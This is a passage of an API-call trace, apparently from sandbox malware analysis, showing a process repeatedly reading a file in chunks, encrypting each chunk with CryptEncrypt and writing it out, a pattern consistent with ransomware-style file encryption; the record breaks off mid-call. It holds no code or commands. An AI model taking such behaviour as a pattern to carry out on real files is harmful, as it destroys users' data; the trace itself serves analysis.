[0273.275] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.275] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.275] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.275] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.275] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.275] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.275] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.275] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.275] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.275] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.276] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.276] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.276] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.276] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.276] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.276] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.276] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.276] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.276] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.276] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.276] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.276] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.276] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.276] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.276] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.277] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.277] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.277] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.277] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.277] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.277] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.277] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.277] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.277] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.277] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.277] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.277] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.277] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.278] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.278] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.278] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.278] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.278] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.278] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.278] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.278] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.278] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.278] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.278] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.278] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.278] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.278] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.278] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.279] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.279] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.279] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.279] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.279] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.279] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.279] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.280] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.280] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.280] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.280] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.280] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.280] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.280] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.280] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.280] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.280] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.280] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.280] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.280] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.280] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.280] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.281] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.281] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.281] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.281] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.281] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.281] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.282] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 